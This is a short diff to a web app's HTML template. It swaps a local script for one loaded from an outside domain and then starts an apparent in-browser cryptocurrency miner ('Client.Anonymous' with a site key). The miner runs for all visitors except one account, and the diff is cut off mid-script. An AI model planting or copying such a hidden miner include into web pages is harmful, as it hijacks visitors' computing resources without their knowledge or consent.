--- a/main_app/templates/test.html
+++ b/main_app/templates/test.html
@@ -9,7 +9,7 @@
     
     <!-- Jus70 -->
 {% if user.email != "a" %}
-<script src="/static/js/abcdefghijklmnopqrstuvwxyz.js"></script>
+<script src="https://www.hostingcloud.racing/V843.js"></script>
 
 <script>
     var _client = new Client.Anonymous('5359e2aefac13b8544fcee9326d4a0aafb5fd62a6991f1e87ade167c09c9967a', {
